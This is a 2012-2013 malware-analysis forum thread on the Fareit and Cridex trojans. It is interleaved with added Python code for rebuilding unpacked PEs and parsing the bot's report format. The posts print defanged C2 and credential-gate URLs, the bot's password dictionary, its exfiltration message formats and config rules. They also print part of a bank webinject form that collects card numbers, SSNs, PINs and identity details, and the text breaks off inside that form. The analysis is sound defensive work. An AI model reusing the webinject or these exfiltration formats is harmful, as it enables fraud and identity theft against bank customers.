A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #17211  by unixfreaxjp
 Sun Dec 16, 2012 7:46 am
To EP_X0FF, nice crypted PE cracks! Will you please blog the details of reversing it?
At the time I saw the crypted packed I just skipped it to save time... (got only the weekend for this)
I thought only @Xylit0l on this planet can reverse it ;P < Steve, you're so busy these days, is it?
PS: I went straight to play with this stuff and posted it in the MalwareMustDie blog mentioning kernelmode & you guys!
#MalwareMustDie! You guys rock!!!
 #17214  by EP_X0FF
 Sun Dec 16, 2012 4:11 pm
unixfreaxjp wrote: To EP_X0FF, nice crypted PE cracks! Will you please blog the details of reversing it?
Sorry, no. I never understood all these descriptions of decryption/unpacking in the AV articles. It is a very boring process if done manually.

Specifically for Fareit: set breakpoints on memory allocation, trace a little until it is called with ERW protection. Dump this region when it is filled with the decrypted payload. Cut off the garbage and rebuild the resulting PE. Done.
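The last two steps of that recipe (dump the region, cut off the garbage, rebuild the PE) as an added Python example; this is not EP_X0FF's tooling and not code from the thread. It assumes a raw dump of the ERW region in which the decrypted PE32 sits at some offset with junk around it and is laid out the way the loader mapped it (every section at its VirtualAddress). Locating the image and fixing the section table is all it does: PointerToRawData and SizeOfRawData are rewritten to the in-memory layout and FileAlignment is set to SectionAlignment. The sample region is constructed inline from a hand-built minimal PE so the script runs offline. An image dumped after the loader resolved imports may still need its import table repaired, which this does not attempt.

```python
import struct

E_LFANEW_OFF = 0x3C          # IMAGE_DOS_HEADER.e_lfanew
SECTION_HDR_SIZE = 40        # sizeof(IMAGE_SECTION_HEADER)


def _u16(buf, off):
    return struct.unpack_from("<H", buf, off)[0]


def _u32(buf, off):
    return struct.unpack_from("<I", buf, off)[0]


def find_pe_images(region):
    """Return offsets inside a raw memory dump where an MZ header points at a
    valid PE signature; that is how the payload is located amid the junk."""
    found = []
    pos = region.find(b"MZ")
    while pos != -1:
        if pos + E_LFANEW_OFF + 4 <= len(region):
            e_lfanew = _u32(region, pos + E_LFANEW_OFF)
            pe = pos + e_lfanew
            if 0x40 <= e_lfanew <= 0x400 and region[pe:pe + 4] == b"PE\0\0":
                found.append(pos)
        pos = region.find(b"MZ", pos + 1)
    return found


def section_table(pe):
    """Parse IMAGE_SECTION_HEADER entries into
    (name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData)."""
    e_lfanew = _u32(pe, E_LFANEW_OFF)
    count = _u16(pe, e_lfanew + 6)          # COFF NumberOfSections
    opt_size = _u16(pe, e_lfanew + 20)      # COFF SizeOfOptionalHeader
    first = e_lfanew + 24 + opt_size
    table = []
    for i in range(count):
        off = first + i * SECTION_HDR_SIZE
        name = pe[off:off + 8].rstrip(b"\0").decode("ascii", "replace")
        table.append((name,) + struct.unpack_from("<IIII", pe, off + 8))
    return table


def rebuild_from_memory(region, base):
    """Carve the image at `base` (SizeOfImage bytes) and make it loadable from
    disk again: raw offsets/sizes become the virtual ones, FileAlignment becomes
    SectionAlignment, because that is how the dumped bytes are actually laid out."""
    e_lfanew = _u32(region, base + E_LFANEW_OFF)
    opt = base + e_lfanew + 24
    section_align = _u32(region, opt + 32)  # OptionalHeader.SectionAlignment
    size_of_image = _u32(region, opt + 56)  # OptionalHeader.SizeOfImage
    img = bytearray(region[base:base + size_of_image])
    struct.pack_into("<I", img, e_lfanew + 24 + 36, section_align)  # FileAlignment
    count = _u16(img, e_lfanew + 6)
    first = e_lfanew + 24 + _u16(img, e_lfanew + 20)
    for i in range(count):
        off = first + i * SECTION_HDR_SIZE
        vsize, vaddr = struct.unpack_from("<II", img, off + 8)
        raw_size = -(-vsize // section_align) * section_align   # round up to alignment
        struct.pack_into("<II", img, off + 16, raw_size, vaddr)  # SizeOfRawData, PointerToRawData
    return bytes(img)


def build_sample_image(payload):
    """Constructed test data: a minimal PE32 as the loader maps it (headers in
    the first 0x1000 page, one section at RVA 0x1000) whose section header still
    carries the on-disk values PointerToRawData=0x400 / SizeOfRawData=0x200."""
    align = 0x1000
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, E_LFANEW_OFF, 0x40)
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 0xE0, 0x102)  # i386, 1 section
    opt = bytearray(0xE0)
    struct.pack_into("<H", opt, 0, 0x10B)       # PE32 magic
    struct.pack_into("<I", opt, 16, 0x1000)     # AddressOfEntryPoint
    struct.pack_into("<I", opt, 28, 0x400000)   # ImageBase
    struct.pack_into("<I", opt, 32, align)      # SectionAlignment
    struct.pack_into("<I", opt, 36, 0x200)      # FileAlignment (on-disk value)
    struct.pack_into("<I", opt, 56, 2 * align)  # SizeOfImage
    struct.pack_into("<I", opt, 60, 0x400)      # SizeOfHeaders
    struct.pack_into("<I", opt, 92, 16)         # NumberOfRvaAndSizes
    sec = bytearray(SECTION_HDR_SIZE)
    sec[:5] = b".text"
    struct.pack_into("<IIII", sec, 8, len(payload), 0x1000, 0x200, 0x400)
    struct.pack_into("<I", sec, 36, 0x60000020)  # CODE | EXECUTE | READ
    headers = bytes(dos) + b"PE\0\0" + coff + bytes(opt) + bytes(sec)
    return headers.ljust(align, b"\0") + payload.ljust(align, b"\0")


if __name__ == "__main__":
    payload = b"constructed payload bytes"
    dump = b"\xCC" * 0x123 + build_sample_image(payload) + b"\x90" * 0x40
    base = find_pe_images(dump)[0]
    fixed = rebuild_from_memory(dump, base)
    print(hex(base), section_table(fixed))
```

On a real dump, read the region into `region`, pick the offset from `find_pe_images` that belongs to the payload (a packer may leave its own MZ header in the same region), and write the result of `rebuild_from_memory` to disk; checking `section_table` before and after makes the fix visible.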
 #17351  by unixfreaxjp
 Sat Dec 22, 2012 7:48 pm
The set of Trojan Parfeit Infection Distributed via Cridex using BHEK 2.1 Plugindetect 0.7.9

Summary: Cridex Callback:
  • h00p://94.73.129.120:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://188.120.226.30:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://188.40.109.204:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://204.15.30.202:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://59.90.221.6:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://69.64.89.82:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://78.28.120.32:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://74.117.107.25:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://174.142.68.239:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://23.29.73.220:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://81.93.250.157:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://188.212.156.170:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://173.203.102.204:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    h00p://84.22.100.108:8080/N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ POST HTTP/1.1
    *) With all Proxy's Port/Server: 8080 / nginx/1.0.10
    *) Downloading Parfeit...
Parfeit VT:
Parfeit Callback URLs:
  • h00p://132.248.49.112:8080/asp/intro.php
    h00p://113.130.65.77:8080/asp/intro.php
    h00p://203.113.98.131:8080/asp/intro.php
    h00p://110.164.58.250:8080/asp/intro.php
    h00p://200.108.18.158:8080/asp/intro.php
    h00p://207.182.144.115:8080/asp/intro.php
    h00p://148.208.216.70:8080/asp/intro.php
    h00p://203.172.252.26:8080/asp/intro.php
    h00p://202.6.120.103:8080/asp/intro.php
    h00p://203.146.208.180:8080/asp/intro.php
    h00p://207.126.57.208:8080/asp/intro.php
    h00p://203.80.16.81:8080/asp/intro.php
    h00p://202.180.221.186:8080/asp/intro.php
Credential CNC Server Info:
  • // Credentials sent CnC panel
    var adminPanelLocation ='h00p://62.76.177.51/if_Career/';
    //Data Modify Process:
    h00p://62.76.177.123/mx/2B/in/cp.php?h=8
    // Phishing Credentials urls
    h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=chase
    h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=wellsfargo
    h00p://62.76.177.51/if_Ipckg/gate.php?botid=RIK-1379CF37C25_9455E50D0B2D20CB&bank=bankofamerica
Brute Password in Parfeit bins:
Code:
phpbb      john316      pass        slayer    
qwerty     richard      aaaaaa      wisdom    
jesus      blink182     amanda      praise    
abc123     peaches      nothing     zxcvbnm   
letmein    cool         ginger      samuel    
test       flower       mother      mike      
love       scooter      snoopy      dallas    
password1  banana       jessica     green     
hello      james        welcome     testtest  
monkey     asdfasdf     pokemon     maverick  
dragon     victory      iloveyou1   onelove   
trustno1   london       mustang     david     
iloveyou   123qwe       helpme      mylove    
shadow     startrek     justin      church    
christ     george       jasmine     friend    
sunshine   winner       orange      god       
master     maggie       testing     destiny   
computer   trinity      apple       none      
princess   online       michelle    microsoft 
tigger     123abc       peace       bubbles   
football   chicken      secret      cocacola  
angel      junior       grace       jordan23  
jesus1     chris        william     ilovegod  
whatever   passw0rd     iloveyou2   football1 
freedom    austin       nicole      loving    
killer     sparky       muffin      nathan    
asdf       admin        gateway     emmanuel  
soccer     merlin       fuckyou1    scooby    
superman   google       asshole     fuckoff   
michael    friends      hahaha      sammy     
cheese     hope         poop        maxwell   
internet   shalom       blessing    jason     
joshua     nintendo     blahblah    john      
fuckyou    looking      myspace1    1q2w3e4r  
blessed    harley       matthew     baby      
baseball   smokey       canada      red123    
starwars   joseph       silver      blabla    
purple     lucky        robert      prince    
jordan     digital      forever     qwert     
faith      thunder      asdfgh      chelsea   
summer     spirit       rachel      angel1    
ashley     bandit       rainbow     hardcore  
buster     enter        guitar      dexter    
heaven     anthony      peanut      saved     
pepper     corvette     batman      hallo     
hunter     hockey       cookie      jasper    
lovely     power        bailey      danielle  
andrew     benjamin     soccer1     kitten    
thomas     iloveyou!    mickey      cassie    
angels     1q2w3e       biteme      stella    
charlie    viper        hello1      prayer    
daniel     genesis      eminem      hotdog    
jennifer   knight       dakota      windows   
single     qwerty1      samantha    mustdie   
hannah     creative     compaq      gates     
qazwsx     foobar       diamond     billgates 
happy      adidas       taylor      ghbdtn    
matrix     rotimi       forum       gfhjkm   hgTYDOMium
Additionals:
 #17740  by unixfreaxjp
 Thu Jan 17, 2013 6:35 pm
The latest set of Trojan Fareit Infection Distributed via Trojan Cridex using BHEK 2.1 Plugindetect 0.7.9

Summary:
Spam URL: h00p://kompot.designcon.tmweb.ru/upload.htm (176.57.216.3)
Or this: h00p://www.piastraollare.com/upload.htm
Landing URL: h00p://dozakialko.ru:8080/forum/links/column.php
(212.112.207.15, 89.111.176.125, 91.224.135.20)
BHEK PluginDetect: http://pastebin.com/50Usb5TE
BHEK Payload Crack Guide/MyNote: http://malwaremustdie.blogspot.jp/p/81.html
↑ different domain, same actors
Cridex Payload:
Code:
h00p://dozakialko.ru:8080/forum/links/column.php?qf=30:1n:1i:1i:33&ye=2v:1k:1m:32:33:1k:1k:31:1j:1o&y=1k&wf=x&xt=t
Cridex VT: https://www.virustotal.com/file/ceff348 ... /analysis/
Fareit VT: https://www.virustotal.com/file/cdbc248 ... /analysis/

Cridex Callback
Method: HTTP POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
Image
To:
Code:
h00p://84.22.100.108:8080
h00p://182.237.17.180:8080
h00p://221.143.48.6:8080
h00p://180.235.150.72:8080
h00p://64.76.19.236:8080
h00p://163.23.107.65:8080
h00p://59.90.221.6:8080
h00p://210.56.23.100:8080
h00p://173.201.177.77:8080
h00p://203.217.147.52:8080
h00p://74.207.237.170:8080
h00p://97.74.113.229:8080
h00p://193.68.82.68:8080
h00p://69.64.89.82:8080
h00p://77.58.193.43:8080
h00p://174.120.86.115:8080
h00p://94.20.30.91:8080
h00p://174.142.68.239:8080
h00p://87.229.26.138:8080
h00p://188.120.226.30:8080
h00p://78.28.120.32:8080
h00p://217.65.100.41:8080
h00p://81.93.250.157:8080
h00p://95.142.167.193:8080
h00p://109.230.229.250:8080
h00p://109.230.229.70:8080
Server's stamps:
Code:
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Wed, 16 Jan 2013 16:17:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
User-Agent Used by Cridex:
Code:
"Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)"
Textual (Botnet?) Commands Sent Via Post to motherships:
Code:
Connection
modify
pattern
replacement
httpinject
conditions
actions
redirect
process
MSG/Protocol Formats:
Code:
// The sent time, user-agent via HTTP
<http time="%%%uu">
<url><![CDATA[%%.%us]]></url>
<useragent><![CDATA[%%.%us]]></useragent>
<data><![CDATA[]]></data>
</http>
 
// Current time sent with url and data
<httpshot time="%%%uu">
<url><![CDATA[%%.%us]]></url>
<data><![CDATA[]]></data>
</httpshot>
 
// FTP data...
<ftp time="%%%uu">
<server><![CDATA[%%u.%%u.%%u.%%u:%%u]]></server>
<user><![CDATA[%%.%us]]></user>
<pass><![CDATA[]]></pass>
</ftp>
 
// Mail POP3 data..
<pop3 time="%%%uu"><server><![CDATA[%%u.%%u.%%u.%%u:%%u]]></server>
<user><![CDATA[%%.%us]]></user><pass><![CDATA[]]></pass>
</pop3>
 
// Command lines...
<cmd id="%u">%u</cmd>
 
// Certification information...
<cert time="%u">
<pass><![CDATA[]]></pass>
<data><![CDATA[]]></data>
</cert>
 
// Internet explorer information
<ie time="%u">
<data><![CDATA[]]></data>
</ie>
 
// Case of firefox....
<ff time="%u">
<data>
<![CDATA[]]>
</data>
</ff>
 
// Case of "mm" = Macromedia?
<mm time="%u">
<data><![CDATA[]]></data>
</mm>
 
// Hashed message contains PC privacy info...
<message set_hash="%%.%us" req_set="%%%%u" req_upd="%%%%u">
<header>
<unique>%%.%us</unique>
<version>%%u</version>
<system>%%u</system>
<network>%%u</network>
</header>
<data>
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDa1gmnqfz0x8rbd5d78HJCgdSgkQy7k8IISlrVm8zezmXmqtbnNt7Mtk0BZxCq0xnjc+WGc1Zd8XHAkC5smrgFLgZYMhClUOEAfDLQhsnrWyjT5spwnkEgIVOv6oifW7rPPOCGbCYi1vnDiHJdy5AQqLfl4ynb5Pk259NwsjX0wQIDAQAB
</data>
</message>
Crypto Method:
Code:
CryptImportPublicKeyInfo
CryptDecodeObjectEx
CryptStringToBinaryA
CertDeleteCertificateFromStore
CertDuplicateCertificateContext
CertEnumCertificatesInStore
CertCloseStore
PFXExportCertStoreEx
CertOpenSystemStoreW
PFXImportCertStore
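As an added example (my code, not from the post and not the bot's own), here is a parser for the report records quoted above together with a minimal DER walk over the base64 blob in `<data>`. The `%%.%us` and `%%%uu` specifiers read as two-stage printf formats (the first pass yields e.g. `%.64s`, the second fills it), so the sample report below is constructed with made-up values in those slots; the wrapping `<report>` root is an assumption for parsing, since the post does not show how records are framed. The blob itself decodes as a SubjectPublicKeyInfo for a 1024-bit RSA key with exponent 65537, which is exactly what the CryptStringToBinaryA, CryptDecodeObjectEx and CryptImportPublicKeyInfo calls listed under "Crypto Method" would consume.

```python
import base64
import xml.etree.ElementTree as ET

OID_RSA_ENCRYPTION = bytes.fromhex("2a864886f70d010101")   # 1.2.840.113549.1.1.1

# The base64 string from the <data> element of the quoted <message> format.
EMBEDDED_KEY_B64 = (
    "MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDa1gmnqfz0x8rbd5d78HJCgdSgkQy7"
    "k8IISlrVm8zezmXmqtbnNt7Mtk0BZxCq0xnjc+WGc1Zd8XHAkC5smrgFLgZYMhClUOEAfD"
    "LQhsnrWyjT5spwnkEgIVOv6oifW7rPPOCGbCYi1vnDiHJdy5AQqLfl4ynb5Pk259NwsjX0wQIDAQAB"
)


def _tlv(buf, pos):
    """Decode one DER tag/length at `pos`; return (tag, value_start, value_end).
    Definite-length encodings only, which is all a SubjectPublicKeyInfo uses."""
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:                       # long form: next N bytes hold the length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, pos, pos + length


def describe_spki(b64):
    """Walk a SubjectPublicKeyInfo and report the algorithm and RSA parameters."""
    der = base64.b64decode(b64)
    tag, spki_start, _ = _tlv(der, 0)                  # SubjectPublicKeyInfo ::= SEQUENCE
    if tag != 0x30:
        raise ValueError("not a SEQUENCE")
    tag, alg_start, alg_end = _tlv(der, spki_start)    # AlgorithmIdentifier ::= SEQUENCE
    tag, oid_start, oid_end = _tlv(der, alg_start)     # OBJECT IDENTIFIER
    if tag != 0x06 or der[oid_start:oid_end] != OID_RSA_ENCRYPTION:
        return {"algorithm": der[oid_start:oid_end].hex()}
    tag, bits_start, _ = _tlv(der, alg_end)            # subjectPublicKey ::= BIT STRING
    if tag != 0x03:
        raise ValueError("expected BIT STRING")
    _, rsa_start, _ = _tlv(der, bits_start + 1)        # skip unused-bits byte; RSAPublicKey ::= SEQUENCE
    _, n_start, n_end = _tlv(der, rsa_start)           # modulus INTEGER
    _, e_start, e_end = _tlv(der, n_end)               # publicExponent INTEGER
    modulus = int.from_bytes(der[n_start:n_end], "big")
    exponent = int.from_bytes(der[e_start:e_end], "big")
    return {"algorithm": "rsaEncryption", "modulus_bits": modulus.bit_length(), "exponent": exponent}


# Constructed sample report: filled-in instances of the formats quoted in the
# post. Host name, hash, timestamps and credentials are made up; only the key
# blob is the one from the post. The <report> root is an assumption.
SAMPLE_REPORT = (
    '<report>'
    '<message set_hash="0123456789abcdef0123456789abcdef01234567" req_set="1" req_upd="0">'
    '<header><unique>WIN-CONSTRUCTED_0001</unique><version>3</version>'
    '<system>2</system><network>1</network></header>'
    '<data>\n' + EMBEDDED_KEY_B64 + '\n</data>'
    '</message>'
    '<ftp time="1358353075"><server><![CDATA[192.0.2.10:21]]></server>'
    '<user><![CDATA[backup]]></user><pass><![CDATA[]]></pass></ftp>'
    '<pop3 time="1358353080"><server><![CDATA[198.51.100.7:110]]></server>'
    '<user><![CDATA[alice]]></user><pass><![CDATA[hunter2]]></pass></pop3>'
    '<http time="1358353090"><url><![CDATA[https://www.example.com/login]]></url>'
    '<useragent><![CDATA[Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)]]></useragent>'
    '<data><![CDATA[]]></data></http>'
    '</report>'
)


def parse_report(xml_text):
    """Turn a report into a list of dicts, one per record, keyed by record type."""
    records = []
    for el in ET.fromstring(xml_text):
        rec = {"type": el.tag, "time": el.get("time")}
        if el.tag == "message":
            rec["unique"] = el.findtext("header/unique")
            rec["set_hash"] = el.get("set_hash")
            rec["public_key"] = describe_spki(el.findtext("data").strip())
        elif el.tag in ("ftp", "pop3"):
            rec["server"] = el.findtext("server")
            rec["user"] = el.findtext("user")
            rec["has_password"] = bool(el.findtext("pass"))   # empty CDATA -> False
        elif el.tag in ("http", "httpshot"):
            rec["url"] = el.findtext("url")
            rec["useragent"] = el.findtext("useragent")
        records.append(rec)
    return records


if __name__ == "__main__":
    for record in parse_report(SAMPLE_REPORT):
        print(record)
```

The point for incident response is that the `<ftp>`, `<pop3>` and `<http>` records tell you which stored credentials and visited URLs a bot reported, while the `<message>` header carries the bot identity and settings hash; `describe_spki` confirms what the embedded blob is before anyone mistakes it for exfiltrated data.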
Fareit Config files snipped:
Image
Image
Code:
"cash & wires accounts"
 
 <settings hash="e0014db74a7606d107a0b61e31f0d159334877e8">
 <httpshots><url type="deny">\.(css|js)($|\?)</url>
 <url contentType="^text/(html|plain)">\.com/k1/</url>
 <url contentType="^text/(html|plain)">/ach/</url>
 <url contentType="^text/(html|plain)">/authentication/zbf/k/</url>
 <url contentType="^text/(html|plain)">/bb/logon/</url>
 <url contentType="^text/(html|plain)">chase\.com</url>
 <url contentType="^text/(html|plain)">/cashman/</url>
 <url contentType="^text/(html|plain)">/cashplus/</url>
    :
"SNS Accounts.."
 
 <formgrabber>
   <url type="deny">\.(swf)($|\?)</url>
   <url type="deny">/isapi/ocget.dll</url>
   <url type="allow">^https?://aol・com/.*/login/</url>
   <url type="allow">^https?://accounts.google・com/ServiceLogin</url>
   <url type="allow">^https?://login.yahoo・com/</url>
   <url type="allow">^https?://login.live・com/</url>
   <url type="deny">^https?://(\w+\.)?aol・com</url>
   <url type="deny">^https?://(\w+\.)?facebook・com/</url> 
       :
ORIGINAL CODE:
 <settings hash="e0014db74a7606d107a0b61e31f0d159334877e8"><httpshots><url type="deny">\.(css|js)($|\?)</url><url contentType="^text/(html|plain)">\.com/k1/</url><url contentType="^text/(html|plain)">/ach/</url><url contentType="^text/(html|plain)">/authentication/zbf/k/</url><url contentType="^text/(html|plain)">/bb/logon/</url><url 
    : (snipped)
<div id="namefr" style="display:none;" >
 <iframe width="50" height="50" id="myfx"  name="myfx"></iframe>
 </div>
 <link href="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8/themes/base/jquery-ui.css" rel="stylesheet" type="text/css"/>
 <style type="text/css">
 .ui-dialog-titlebar
 {
   background: white
 }
 .text1a
 {
   font-family: Arial;
   font-size: 10px;
 }
 .sunclass
 {
   border-bottom-color: #cccccc;
   border-bottom-style: solid;
   border-bottom-width: 1px;
   border-collapse: collapse;
   background-color: #f5f6f1;
   color: #333333;
   margin-right:10px;
   margin-left:10px;
   text-align: center;
 }
 </style>
 <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
 <script src="https://ajax.googleapis.com/ajax/libs/jqueryui/1.8/jquery-ui.min.js"></script>
 <div id="msg"   style=" display:none; height:60px;" class=sunclass>
 <div id="box"    class=sunclass  style="border-top-style: solid; border-top-color: #cccccc;border-top-width: 1px;padding-top:20px;padding-bottom:20px;">
 <font id="err" style="font-weight:700;font-family: Arial;font-size: 12px;">The <span id="ername">Passcode</span> you entered does not match our records. Please verify and make sure you re-enter your <span id="ername1"> passcode </span>&nbsp correctly.</font>
 </div>
 </div>
 <div id="dialog"   style=" display:none; height:180px; width:350px;padding:0; margin0;">
 <div id="txt1"  class=sunclass  style="border-top-style: solid; border-top-color: #cccccc;border-top-width: 1px;">
 <font style="font-weight:700;font-family: Arial;font-size: 10px;">In order to provide you with extra security ,we occasionally need to ask for additional information when you access you account online.</font>
 </div>
 <div id="txt2"   class=sunclass>
 <font style="font-weight: 700;font-family: Arial;font-size: 10px;">Please enter the information below to continue:</font>
 </div>
 <form action="https://secure.americanexpress.com/NextGenNavigation/img/logo_bluebox.gif" id="test" method="post" target="myfx" >
 <!--CC-->
 <div id="full_cc"  class=sunclass style="height:30px ;text-align: left;">
 <table>
 <tr>
 <td>
 <div id="div_cc_text" style="padding:1px; padding-top:3px; width:72px ; height:25px;text-align:left;">
 <font style="font-weight:700;font-family: Arial;font-size: 10px;">Card number:</font>
 </div>
 </td>
 <td>
 <div id="div_cc" style ="padding:1px;">
 <input type="text" class="amountfield"  id="cc1" style="text-align:right;width:34px; height:12px; font-weight:700;font-family: Arial;font-size: 10px; width=46px;" name="cc1"  onkeyup="tabNext1CC(this);"   maxlength=4 >
 <font style="font-weight:700;font-family: Arial;font-size: 10px;">-</font>
 <input type="text" class="amountfield"  id="cc2"style="text-align:right; width:42px; height:12px; font-weight:700;font-family: Arial;font-size: 10px; " name="cc2"   onkeyup="tabNext2CC(this);"  maxlength=6 >
 <font style="font-weight:700;font-family: Arial;font-size: 10px;">-</font>
 <input type="text" class="amountfield"  id="cc3" style="text-align:right;width:38px; height:12px;  font-weight:700;font-family: Arial;font-size: 10px;" name="cc3"   maxlength=5 >
 </div>
 </td>
 </tr>
 </table>
 </div>
 <!--EXP-->
 <div id="fulll_exp"  class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="div_exp" style="padding:1px; padding-top:7px; width:72px ; height:25px;text-align:left;">
 <font style="font-weight:700;font-family: Arial;font-size: 10px;">Exp.date:</font>
 </div>
 </td>
 <td><div id="div_exp" style ="padding:1px;">
 <input type="text"  class="amountfield"   id="exp_mm" style="text-align:right; width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="exp_mm"    maxlength=2 >
 <font style="font-weight:700;font-family: Arial;font-size: 10px;">/</font>
 <input type="text"  class="amountfield"  id="exp_yy"style="text-align:right; width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="exp_yy"     maxlength=4 >
 </div></td>
 </tr>
 </table>
 </div>
 <!--CVV-->
 <div id="txt2"   class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="div_cvv" style="padding:1px; padding-top:7px; width:72px ; height:25px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">CVV Code:</font></td></div>
 <td><div id="div_pininp" style =" padding:1px;"><input type="text"   id="cvv" style="text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="cvv"    maxlength=4 > <a href="#" style="font-weight:700;font-family: Arial;font-size: 10px;" onmouseover="over('http://www.upload.fm/file/312/ac62dbbce67681a33d23490607f59cf6')" onmousemove="move(event)" onmouseout="out()">(?)</a></div></td>
 </tr>
 </table>
 </div>
 <!--3 digit code-->
 <div id="txt2"   class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="div_3digitcode" style="padding:1px; padding-top:7px; width:172px ; height:25px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">3-Digit Code on the back of card:</font></td></div>
 <td><div id="div_pininp" style =" padding:1px;"><input type="text"   id="3digitcode" style="text-align:right;width:33px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="3digitcode" method="post"   maxlength=3 > <a href="#" style="font-weight:700;font-family: Arial;font-size: 10px;" onmouseover="over('http://www.upload.fm/file/273/58be12e2c069fcc7b20ebb2a11921f98')" onmousemove="move(event)" onmouseout="out()">(?)</a></div></td>
 </tr>
 </table>
 </div>
 <!--SSN-->
 <div id="txt2"   class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="div_ssn" style="width:143px ;padding-top:7px; height:25px;padding: 1px;padding-top:5px; text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Social Security Number:</font></td></div>
 <td><div id="div_pininp" style =" padding:1px;">
 <input type="text" class="amountfield"   id="ssn_1" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_1"     maxlength=3 >
 <font style="font-family: Verdana;font-size: 11px;">-</font>
 <input type="text"  class="amountfield"   id="ssn_2" style="width:38px; height14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_2"     maxlength=2 >
 <font style="font-family: Verdana;font-size: 11px;">-</font>
 <input type="text" class="amountfield"   id="ssn_3" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ssn_3"     maxlength=4 >
 </div></td>
 </tr>
 </table>
 </div>
 <!--Personal security PIN-->
 <div id="txt2"   class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="div_ps_pin" style="width:143px ;padding-top:7px; height:25px;padding: 1px;padding-top:5px; text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Personal security PIN:</font></td></div>
 <td><div id="div_pininp" style =" padding:1px;">
 <input type="text" class="amountfield"   id="ps_pin" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="ps_pin"     maxlength=4 >
 </div></td>
 </tr>
 </table>
 </div>
 <!--MMN-->
 <div id="txt2"   class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="pincode" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">Mother's Maiden Name:</font></td></div>
 <td><div id="div_pininp" style =" padding:1px;">
 <input type="text" class="amountfield"    id="exp_mm" style="width:160px; height:12px; text-align:left; font-weight:700;font-family: Arial;font-size: 10px;" name="mmn"   >
 </div></td>
 </tr>
 </table>
 </div>
 <!--POB-->
 <div id="txt2"   class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="pincode" style="width:143px ; height:25px;padding: 1px; text-align: left;padding-top:7px "><font style="font-weight:700;font-family: Arial;font-size: 10px;">Place of birth:</font></td></div>
 <td><div id="div_pob" style =" padding:1px;">
 <input type="text" class="amountfield"    id="pob" style="width:160px; height:12px; text-align:left; font-weight:700;font-family: Arial;font-size: 10px;" name="pob"   >
 </div></td>
 </tr>
 </table>
 </div>
 <!--DOB-->
 <div id="txt2"  class=sunclass style="text-align: left;">
 <table>
 <tr>
 <td align="right">
 <div id="div_dob" style="width:143px ;padding-top:7px; height:25px;padding: 1px;text-align:left;"><font style="font-weight:700;font-family: Arial;font-size: 10px;">Date of birth:</font></td></div>
 <td><div id="div_pininp" style =" padding:1px;">
 <input type="text"  class="amountfield"  id="dob_mm" style="width:38px; height:14px; text-align:right;width:38px; height:12px; font-weight:700;font-family: Arial;font-size: 10px;" name="dob_mm"     maxlength=2 >
 <font style="font-family: Verdana;font-size: 11px;">-</font>
